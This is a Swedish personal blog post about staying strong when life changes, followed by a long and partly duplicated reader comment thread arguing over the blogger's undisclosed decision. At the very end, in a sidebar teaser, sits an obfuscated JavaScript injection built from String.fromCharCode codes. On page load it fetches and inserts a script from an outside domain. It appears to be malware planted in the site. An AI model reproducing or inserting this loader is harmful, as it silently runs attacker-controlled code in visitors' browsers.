Dags att tänka om, när livet inte blev som planerat…

image

Några kloka ord……

Att vara stark är inte att springa fortast eller att lyfta tyngst. Att vara stark är inte att veta bäst eller att vara främst. 

Att vara stark är att acceptera livets villkor. Att vara stark är att tänka om, när livet inte blir som du planerat. Att vara stark är att se möjligheterna i det som verkar omöjligt. Att fortsätta kämpa trots motvind och låta den bli till en utmaning.

-Att vara stark är att lära sig rida MED vågen, INTE mot….. imageimage  image

Kram <3

127 Komentarer

 1. Precis så är det! Hoppas att du närmar dig ett slut på din vånda så att du och lilleman kan få njuta av sommaren. Kram

 2. Precis så är det! Hoppas att du närmar dig ett slut på din vånda så att du och lilleman kan få njuta av sommaren. Kram

 3. Finaste My! Tänker på dig varje dag , trots att jag ej kommenterat på sistone . Skickar en stor styrkekram till dig!
  Livet blir nästan aldrig som man planerar , men tycker du är för ung att ställas inför så svåra beslut, som detta verkar vara. Men du är vacker o stark o starkare kommer du att gå ur detta . Bry dig inte om andras åsikter, det är DITT liv o hur det än känns nu, kommer allt att bli bra.
  Varm kram

 4. Finaste My! Tänker på dig varje dag , trots att jag ej kommenterat på sistone . Skickar en stor styrkekram till dig!
  Livet blir nästan aldrig som man planerar , men tycker du är för ung att ställas inför så svåra beslut, som detta verkar vara. Men du är vacker o stark o starkare kommer du att gå ur detta . Bry dig inte om andras åsikter, det är DITT liv o hur det än känns nu, kommer allt att bli bra.
  Varm kram

 5. Håller med Christina ovan……Så ung och driftig som du är.
  Finns något som heter avundssjuka.
  Önskar dej all lycka för det är du värd…..kram

 6. My kan du inte skriva vad du gör under tiden du funderar över vilket beslut du ska ta. Känner att det hade varit trevligare läsning än fler inlägg om bara din ångest. Berätta gärna också om varför du måste göra ett beslut och när du kom fram till detta. Vad var anledningen? Kom det hastigt på eller har du vetat om det länge? Vad har hänt mellan dig och Madde? Lycka till!

     • Hoppas hon hade nåt snällt att säga, inte längesedan hon skrev på sin blogg att hon tagit totalt avstånd från dej !

     • Samma som jag skrev för ett tag sedan också…Ilmrud skrev att hon aktivt tog avstånd från dig!
      Vilken tur att jag inte är kändisbloggare, hade blivit knäpp av alla turer hit o dit med vänner o ickevänner o nästanvänner…

     • Men, Anna. Som jag svarade förra gången. Jag SÅG inte kommentaren. Jag och Madde satt i samma rum när du skrev till mig förra gången. OM nu varken inte JAG har uppfattat detta som ett issue eller lagt så mycket som en bråkdels sekund att tänka på denna kommentaren som du nu för andra gången tar upp. Så kan vi iaf konstatera att det är ingen bekymmer för mig iaf. jag har något större saker att greppa och hantera just nu…… Mvh

    • Ann svarar på en fråga ann har ställt??? tidigare har Ann kommentarat ann??? nu får du väl ändå ge dig Ann/ann.

   • Detta säger väl allt… ”Madde vem?” Bloggvärldens baksida, man dissar allt och alla för att själv nå framgång, tyvärr:( Nya vänner är lätt att få, svårare att behålla dom gamla. Lycka till med ditt beslut. Kram

     • Du känner säker också Olsson, Andersson, Madde Y och Madde X mfl. Men My nu är det väl ändå så att den enda Madde du har nämnt på bloggen är väl ändå bara en, sen kanske att du känner en massa andra ”Madde”, men du vet precis vem vi menar, du behöver ju inte idiotförklara oss:( Förstår inte att du orkar med att blogga och poosa när du mår så dåligt, själv orkade jag inte ta mig ur sängen. Kram

 7. Håller med Christina ovan……Så ung och driftig som du är.
  Finns något som heter avundssjuka.
  Önskar dej all lycka för det är du värd…..kram

 8. Du skriver så klokt. För det är ju precis så, allt ändras hela tiden och det enda vi kan göra är att förhålla oss till den verklighet vi befinner oss i. ”Livet är inte ett problem som ska lösas utan en verklighet som ska upplevas.” Skrev Kirgegaard för länge sedan.
  Lycka till med allt.

 9. My kan du inte skriva vad du gör under tiden du funderar över vilket beslut du ska ta. Känner att det hade varit trevligare läsning än fler inlägg om bara din ångest. Berätta gärna också om varför du måste göra ett beslut och när du kom fram till detta. Vad var anledningen? Kom det hastigt på eller har du vetat om det länge? Vad har hänt mellan dig och Madde? Lycka till!

     • Hoppas hon hade nåt snällt att säga, inte längesedan hon skrev på sin blogg att hon tagit totalt avstånd från dej !

     • Samma som jag skrev för ett tag sedan också…Ilmrud skrev att hon aktivt tog avstånd från dig!
      Vilken tur att jag inte är kändisbloggare, hade blivit knäpp av alla turer hit o dit med vänner o ickevänner o nästanvänner…

     • Men, Anna. Som jag svarade förra gången. Jag SÅG inte kommentaren. Jag och Madde satt i samma rum när du skrev till mig förra gången. OM nu varken inte JAG har uppfattat detta som ett issue eller lagt så mycket som en bråkdels sekund att tänka på denna kommentaren som du nu för andra gången tar upp. Så kan vi iaf konstatera att det är ingen bekymmer för mig iaf. jag har något större saker att greppa och hantera just nu…… Mvh

    • Ann svarar på en fråga ann har ställt??? tidigare har Ann kommentarat ann??? nu får du väl ändå ge dig Ann/ann.

   • Detta säger väl allt… ”Madde vem?” Bloggvärldens baksida, man dissar allt och alla för att själv nå framgång, tyvärr:( Nya vänner är lätt att få, svårare att behålla dom gamla. Lycka till med ditt beslut. Kram

    • Jag känner sex Madde 🙂 Ilrmud, svensson, Petersson, Larsson, Madde M och Madde S. Så det är ingen baksida så vitt jag vet…

     • Du känner säker också Olsson, Andersson, Madde Y och Madde X mfl. Men My nu är det väl ändå så att den enda Madde du har nämnt på bloggen är väl ändå bara en, sen kanske att du känner en massa andra ”Madde”, men du vet precis vem vi menar, du behöver ju inte idiotförklara oss:( Förstår inte att du orkar med att blogga och poosa när du mår så dåligt, själv orkade jag inte ta mig ur sängen. Kram

 10. Du skriver så klokt. För det är ju precis så, allt ändras hela tiden och det enda vi kan göra är att förhålla oss till den verklighet vi befinner oss i. ”Livet är inte ett problem som ska lösas utan en verklighet som ska upplevas.” Skrev Kirgegaard för länge sedan.

  Lycka till med allt.

 11. Ett det ett ekonomiskt eller familjärt beslut. Handlar det om dig själv eller är det andra som ber dig att ta ett ev beslut.

  • Guuuuuuud Ann! Jag vill inte vara kort eller avig mot dig. Men nu orkar jag inte svara mer på alla dina frågor. Jag berättar när jag vet, kan och får..

 12. Oftast vet man nog någonstans vilket beslut man ska ta …. Men när man är redo är en annan sak . Men en sak vet jag, någon gång blir det bra igen även om man i stunden tvivlar. Vissa människor får genomgå så mycket, men någonstans finns ljuset My så håll ut. Kram på Dej.

 13. Nu har det varit ångest och vånda i mer än en vecka om ett beslut som skulle förändra ditt liv. Du har delgett oss hur dåligt du mått och det ÄR starkt. Men. . Det är nog ändå dags du berättar lite mer nu. Blir det inte lättare för dig själv tror du? Men du och Madde ”vem” är ganska duktiga på att säga A men inte B i era bloggar och vi som läser era bloggar tröttnat ganska snart. Jag vet det är ett sätt att få oss läsare nyfikna och fortsätta titta in för att se VAD det kan vara ni skriver om men när det bara går ut på att hålla läsarna på halster och tala om att du inte kan eller får säga nåt då är det bättre att inte säga nåt alls. Att du mått dåligt och delat med dig av det är som sagt starkt men ändå ska skenet hållas uppe med vackra bilder och blogginlägg. Ta en paus och skriv NÄR ditt beslut är taget. Tänk på dig själv fram till dess.

  • Eller sluta läs min blogg tills du känner att du kan respekterar mig, mina beslut och mina inlägg…. Jag talar för mig själv, inte för någon annan!

   • Nu börjar du bli lika kaxig/snorkig som Johanna Toftby i din svar. Orkar du inte svara dina läsare i en trevlig ton så låt bli att svara istället. Följt Pernilla Wahlgren i flera år, och aldrig att hon varit snäsig, trots idiotiska kommentarer.

    • Hej! Pernilla är omtänksam… rak och korrekt! Detta var ett konkret svar efter måååååånga återupprepade vänliga svar. Dessutom svarar jag inte otrevlig. Stör man sig är det ju bättre att inte läsa… det är ju ändå det som är så otroligt sköntsom läsare/föjare, at det är helt upp till var och en vad man vill läsa/följa.

     • Eller ta till dig av kritiken! Du upplevs verkligen otrevlig i dina svar… löjligt att säga til alls att sluta läsa… Din blogg går verkligen utför…. Du låtsas som att du inte bryr dig! varför svarar du kan man undra då… Mu väntar nog alla bara på det sk beslutet – sedan är det nog många som försvinner härifrån.. No worries!!

   • Bry dig inte om att svara istället! Din rätta sida visar sig när folk inte stryker medhårs och bara ger komplimanger… nog får ditt Sk beslut vara av extrem karaktär när du målar upp det på det här sättet! Istället för att springa runt och fota dig flera gånger om dagen och lusläsa bloggens kommentarer borde du ägna tiden åt att fatta ditt sk beslut!! Din sk ångest känns inte det minsta äkta med tanke på att du kör på som vanligt…

  • Gammal:
   Vadå dags att berätta??
   My berättar väl för fan när hon vill o kan. Passar det inte så ge fan i att läsa här..
   Men du mfl här inne väntar väl bara på nått saftigt skvaller som ni kan sprida vidare.
   My: kKraaaaaaam ! Det kommer att bli bättre

 14. Men Herre Gud! Sluta tjata och spekulera i vad som är på gång för My. Hon har flera gånger talat om att När hon kan och får DÅ talar hon om vad det är. Bara för alla att svälja nyfikenheten och vänta.

 15. Hej My.
  Jag är mamma till underbara killar farmor till fem lika underbara barnbarn.
  Har läst din blogg sedan jag såg att det skrevs i någon tidning. Att du bloggade om blommar jag som älskar allt vad blommor heter.
  Har känt att som mamma skulle man vara orolig för dig. Du har för mycket omkring dig det orkar ingen inte en en ung tjej som du. Kommer inte med några pekfingrar utan man bli bara orolig för dig. Jag vill att alla skall må bra även de som jag inte känner personligen. Tror du inte att du skulle må bra att bo i t.e.x Kalmar. Tänker på din älskling Lilleman. Då har du nära till honom även när han är hos sin pappa. Du kan pussa på honom honom om han är med pappa på jobbet ibland.
  Hälsningar från en hösnsmamma och farmor/Kramar Ewa

 16. Du skriver den klokaste av klokaste meningarna ”rid med vågen och inte mot” Det är det bästa man kan göra, säger absolut inte att det är lätt, vet av egen erfarenhet, när man får ångest. Följ den och låt den ebba ut. Panikångest är tufft och gör ont. Kram

 17. Ett det ett ekonomiskt eller familjärt beslut. Handlar det om dig själv eller är det andra som ber dig att ta ett ev beslut.

  • Guuuuuuud Ann! Jag vill inte vara kort eller avig mot dig. Men nu orkar jag inte svara mer på alla dina frågor. Jag berättar när jag vet, kan och får..

 18. Hej,
  De fina arbetskläderna som du visade för ett tag sedan, rosa tröjor och mörka byxor. Använder ni inte dem i affären? Måste ju vara mer praktiskt än kortkort.
  Och vad har hänt med din hund? Var bor den nu?
  Lycka till med allt.
  ?

 19. Oftast vet man nog någonstans vilket beslut man ska ta …. Men när man är redo är en annan sak . Men en sak vet jag, någon gång blir det bra igen även om man i stunden tvivlar. Vissa människor får genomgå så mycket, men någonstans finns ljuset My så håll ut. Kram på Dej.

 20. Jag respekterar dig och alla andra och menar inget illa! Men du har skrivit en massa om din vånda inför ett beslut som tydligen ska förändra ditt liv och du har i samband med detta dragit på dig panikångest. Med ett ganska stort antal personer omkring mig med psykiska besvär så vet jag av erfarenhet att när det kommer FÖR mycket prat och för många ord (precis som i din blogg sista tiden ) då är det dags att dra i handbromsen och stanna upp och kanske bara tänka på sig själv. Ni vill ha era läsare, det vet jag, för läser vi inte då behöver ni inte blogga. Jag vill dig väl, jag vill alla väl och jag läser gärna din och andras bloggar, men man måste få tycka och jag personligen skulle nog liksom ”backa” ett steg och ta det lugnt tills nödvändiga beslut är tagna. Hoppas du nu i alla fall delar med dig när det väl är överstökat. Förstår om du INTE förstår hur jag menar men oavsett vilket så är det DU som är det viktiga. Koppla av, ta dina beslut !

  • Tack för omtanken! <3 Jag gör bara det som jag känner at jag klarar av. Just u så går det upp och ner. Det är stunder mitt på dagen som känns okay. Stunder jag känner mig stark och stabil. Sen plötsligt från ingenstans så slår det till igen.PÅ olika sätt. smärta, andnöd, obehag, tårar, panik. jag kan varken styre eller kontralera det. Men jag håller mig över "vatten ytan" <3

 21. Tycker du ska ta en bloggpaus , o bara vila från bloggen,skriv inget alls o berätta ditt svåra beslut när du orkar , lycka till med allt

 22. Vad tråkigt att du mår dåligt. När jag har beslut att ta som är stora med både för- och nackdelar, så brukar jag försöka låtsas för mig själv att jag valt det ena. Sedan känner jag efter hur det känns i magen när jag valt. Sedan gör jag likadant fast jag låtsas att jag valt det andra och känner efter. Jag går mycket på känsla, och om det inte känns bra i magen (trots att det utåt sett, borde vara det bästa valet); då är det inte rätt. Hoppas det känns bättre snart! Du är stark och duktig och vet bäst hur du vill leva ditt liv,!men det är ok att vara svag ibland. Du är inte en robot. Kram

  • Det var ett välskrivet kommentar av (gammal), hon fick ett snäsigt svar tillbaka, hon menade väl och hade rätt!
   Du ska be om ursäkt, tycker jag!

   • snäsigt svar till ”gammal”? jag tackade för omtanken och förklarade hur jag kände och såg på det? Vet du vad, att vi inte alla tycker lika eller har samma åsikter. det är hELT okay. DET måste man kunna förlika sig med. jag orkar faktiskt inte med att sätta mig och försvara mina svar eller argumentera i långa konversationer. jag är för trött och ledsen för det. Det finns ingen hård ton ifrån mig. Sen om DU tolkar det genom min skrift, då får det stå för dig. Det är inte så det är iaf. OM nu ”gammal” hade taft illa vid sig så tror jag ( med tanke på hennes omtänksamma, utförliga och örliga kommentar) att hon hade skrivit det själv istället….. Så nu säger jag tack och gonatt. MVH My

   • oj, Anne. Nu blev det fel. Jag missförstod dig och trodde att du tyckte att JAG skulle be om ursäkt….. nog om det! natti natti!

 23. Nu har det varit ångest och vånda i mer än en vecka om ett beslut som skulle förändra ditt liv. Du har delgett oss hur dåligt du mått och det ÄR starkt. Men. . Det är nog ändå dags du berättar lite mer nu. Blir det inte lättare för dig själv tror du? Men du och Madde ”vem” är ganska duktiga på att säga A men inte B i era bloggar och vi som läser era bloggar tröttnat ganska snart. Jag vet det är ett sätt att få oss läsare nyfikna och fortsätta titta in för att se VAD det kan vara ni skriver om men när det bara går ut på att hålla läsarna på halster och tala om att du inte kan eller får säga nåt då är det bättre att inte säga nåt alls. Att du mått dåligt och delat med dig av det är som sagt starkt men ändå ska skenet hållas uppe med vackra bilder och blogginlägg. Ta en paus och skriv NÄR ditt beslut är taget. Tänk på dig själv fram till dess.

  • Eller sluta läs min blogg tills du känner att du kan respekterar mig, mina beslut och mina inlägg…. Jag talar för mig själv, inte för någon annan!

   • Nu börjar du bli lika kaxig/snorkig som Johanna Toftby i din svar. Orkar du inte svara dina läsare i en trevlig ton så låt bli att svara istället. Följt Pernilla Wahlgren i flera år, och aldrig att hon varit snäsig, trots idiotiska kommentarer.

    • Hej! Pernilla är omtänksam… rak och korrekt! Detta var ett konkret svar efter måååååånga återupprepade vänliga svar. Dessutom svarar jag inte otrevlig. Stör man sig är det ju bättre att inte läsa… det är ju ändå det som är så otroligt sköntsom läsare/föjare, at det är helt upp till var och en vad man vill läsa/följa.

     • Eller ta till dig av kritiken! Du upplevs verkligen otrevlig i dina svar… löjligt att säga til alls att sluta läsa… Din blogg går verkligen utför…. Du låtsas som att du inte bryr dig! varför svarar du kan man undra då… Mu väntar nog alla bara på det sk beslutet – sedan är det nog många som försvinner härifrån.. No worries!!

   • Bry dig inte om att svara istället! Din rätta sida visar sig när folk inte stryker medhårs och bara ger komplimanger… nog får ditt Sk beslut vara av extrem karaktär när du målar upp det på det här sättet! Istället för att springa runt och fota dig flera gånger om dagen och lusläsa bloggens kommentarer borde du ägna tiden åt att fatta ditt sk beslut!! Din sk ångest känns inte det minsta äkta med tanke på att du kör på som vanligt…

  • Gammal:
   Vadå dags att berätta??
   My berättar väl för fan när hon vill o kan. Passar det inte så ge fan i att läsa här..
   Men du mfl här inne väntar väl bara på nått saftigt skvaller som ni kan sprida vidare.

   My: kKraaaaaaam ! Det kommer att bli bättre

 24. Men Herre Gud! Sluta tjata och spekulera i vad som är på gång för My. Hon har flera gånger talat om att När hon kan och får DÅ talar hon om vad det är. Bara för alla att svälja nyfikenheten och vänta.

 25. Hej My.

  Jag är mamma till underbara killar farmor till fem lika underbara barnbarn.
  Har läst din blogg sedan jag såg att det skrevs i någon tidning. Att du bloggade om blommar jag som älskar allt vad blommor heter.
  Har känt att som mamma skulle man vara orolig för dig. Du har för mycket omkring dig det orkar ingen inte en en ung tjej som du. Kommer inte med några pekfingrar utan man bli bara orolig för dig. Jag vill att alla skall må bra även de som jag inte känner personligen. Tror du inte att du skulle må bra att bo i t.e.x Kalmar. Tänker på din älskling Lilleman. Då har du nära till honom även när han är hos sin pappa. Du kan pussa på honom honom om han är med pappa på jobbet ibland.
  Hälsningar från en hösnsmamma och farmor/Kramar Ewa

 26. Du skriver den klokaste av klokaste meningarna ”rid med vågen och inte mot” Det är det bästa man kan göra, säger absolut inte att det är lätt, vet av egen erfarenhet, när man får ångest. Följ den och låt den ebba ut. Panikångest är tufft och gör ont. Kram

 27. Tack o hej från mej, tråkigt att du inte fattar vad dina bloggläsare menar, vi har faktiskt stöttat dig:) Att bli stor i bloggvärlden är okej men man måste inte bli kaxig och otrevlig i svarskommentarerna:( Du är egentligen en helt vanlig ”Svensson”, glöm aldrig det, även om du varit med i Ensam mamma söker, Kram o ha ett fortsatt bra liv:))

  • Hej ”Abo” varför inte skriva ditt riktiga namn? Varför spela detta dubbelspel? ditt IP nummer har ju ca 7 olika namn, vissa trevliga kommentarer andra provocerande, och rent av elaka. Nej, du, NU räcker det. Du figurerar en hel del inne på Ilmruds sida……… där du skriver samma saker om mig, Så nu förstår jag varför DU förstod att det var den Madde som du menade. Ber så hemsk mycket om ursäkt över att JAG inte förstod vilken Madde du menade. Jag börjar se den röda råden i dina olika påhopp, och ditt försök till ryktesspridning och drama Sånt stöttar jag inte! Men jag stöttar dig helhjärtat i ditt beslut att sluta följa mig! Tack och hej! Mvh My

 28. Jag menade hennes första kommentar, då var det ett icke snällt svar från dig.
  Hennes andra kommentar bemötte du med respekt!
  No hard feelings från min sida.
  Slaap lekker!

 29. Hej,
  De fina arbetskläderna som du visade för ett tag sedan, rosa tröjor och mörka byxor. Använder ni inte dem i affären? Måste ju vara mer praktiskt än kortkort.
  Och vad har hänt med din hund? Var bor den nu?

  Lycka till med allt.

  🙂

 30. Jag respekterar dig och alla andra och menar inget illa! Men du har skrivit en massa om din vånda inför ett beslut som tydligen ska förändra ditt liv och du har i samband med detta dragit på dig panikångest. Med ett ganska stort antal personer omkring mig med psykiska besvär så vet jag av erfarenhet att när det kommer FÖR mycket prat och för många ord (precis som i din blogg sista tiden ) då är det dags att dra i handbromsen och stanna upp och kanske bara tänka på sig själv. Ni vill ha era läsare, det vet jag, för läser vi inte då behöver ni inte blogga. Jag vill dig väl, jag vill alla väl och jag läser gärna din och andras bloggar, men man måste få tycka och jag personligen skulle nog liksom ”backa” ett steg och ta det lugnt tills nödvändiga beslut är tagna. Hoppas du nu i alla fall delar med dig när det väl är överstökat. Förstår om du INTE förstår hur jag menar men oavsett vilket så är det DU som är det viktiga. Koppla av, ta dina beslut !

  • Tack för omtanken! <3 Jag gör bara det som jag känner at jag klarar av. Just u så går det upp och ner. Det är stunder mitt på dagen som känns okay. Stunder jag känner mig stark och stabil. Sen plötsligt från ingenstans så slår det till igen.PÅ olika sätt. smärta, andnöd, obehag, tårar, panik. jag kan varken styre eller kontralera det. Men jag håller mig över "vatten ytan" <3

 31. Tycker du ska ta en bloggpaus , o bara vila från bloggen,skriv inget alls o berätta ditt svåra beslut när du orkar , lycka till med allt

 32. Hoppas du får lite sömn inatt, jag fattar inte att du ens står upp efter dessa veckor som du har bakom dig. Man klara mer än man tror det är du bevis på. Godnatt My imorgon en ny dag! Kram

 33. Vad tråkigt att du mår dåligt. När jag har beslut att ta som är stora med både för- och nackdelar, så brukar jag försöka låtsas för mig själv att jag valt det ena. Sedan känner jag efter hur det känns i magen när jag valt. Sedan gör jag likadant fast jag låtsas att jag valt det andra och känner efter. Jag går mycket på känsla, och om det inte känns bra i magen (trots att det utåt sett, borde vara det bästa valet); då är det inte rätt. Hoppas det känns bättre snart! Du är stark och duktig och vet bäst hur du vill leva ditt liv,!men det är ok att vara svag ibland. Du är inte en robot. Kram

  • Det var ett välskrivet kommentar av (gammal), hon fick ett snäsigt svar tillbaka, hon menade väl och hade rätt!
   Du ska be om ursäkt, tycker jag!

   • snäsigt svar till ”gammal”? jag tackade för omtanken och förklarade hur jag kände och såg på det? Vet du vad, att vi inte alla tycker lika eller har samma åsikter. det är hELT okay. DET måste man kunna förlika sig med. jag orkar faktiskt inte med att sätta mig och försvara mina svar eller argumentera i långa konversationer. jag är för trött och ledsen för det. Det finns ingen hård ton ifrån mig. Sen om DU tolkar det genom min skrift, då får det stå för dig. Det är inte så det är iaf. OM nu ”gammal” hade taft illa vid sig så tror jag ( med tanke på hennes omtänksamma, utförliga och örliga kommentar) att hon hade skrivit det själv istället….. Så nu säger jag tack och gonatt. MVH My

 34. Nää, fy vad illa en del behandlar My ? Man gör inte så mot någon som
  mår så himla dåligt. Jag får f*n ont i magen.
  My, sköt om dig och hoppas du blir av med din ångest snart. Jag
  har det själv och det är inte roligt alltså.
  Kram
  /Eva

 35. Tack o hej från mej, tråkigt att du inte fattar vad dina bloggläsare menar, vi har faktiskt stöttat dig:) Att bli stor i bloggvärlden är okej men man måste inte bli kaxig och otrevlig i svarskommentarerna:( Du är egentligen en helt vanlig ”Svensson”, glöm aldrig det, även om du varit med i Ensam mamma söker, Kram o ha ett fortsatt bra liv:))

  • Hej ”Abo” varför inte skriva ditt riktiga namn? Varför spela detta dubbelspel? ditt IP nummer har ju ca 7 olika namn, vissa trevliga kommentarer andra provocerande, och rent av elaka. Nej, du, NU räcker det. Du figurerar en hel del inne på Ilmruds sida……… där du skriver samma saker om mig, Så nu förstår jag varför DU förstod att det var den Madde som du menade. Ber så hemsk mycket om ursäkt över att JAG inte förstod vilken Madde du menade. Jag börjar se den röda råden i dina olika påhopp, och ditt försök till ryktesspridning och drama Sånt stöttar jag inte! Men jag stöttar dig helhjärtat i ditt beslut att sluta följa mig! Tack och hej! Mvh My

 36. Jag menade hennes första kommentar, då var det ett icke snällt svar från dig.
  Hennes andra kommentar bemötte du med respekt!
  No hard feelings från min sida.
  Slaap lekker!

 37. Hoppas du får lite sömn inatt, jag fattar inte att du ens står upp efter dessa veckor som du har bakom dig. Man klara mer än man tror det är du bevis på. Godnatt My imorgon en ny dag! Kram

 38. Nää, fy vad illa en del behandlar My 🙁 Man gör inte så mot någon som
  mår så himla dåligt. Jag får f*n ont i magen.
  My, sköt om dig och hoppas du blir av med din ångest snart. Jag
  har det själv och det är inte roligt alltså.

  Kram
  /Eva

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/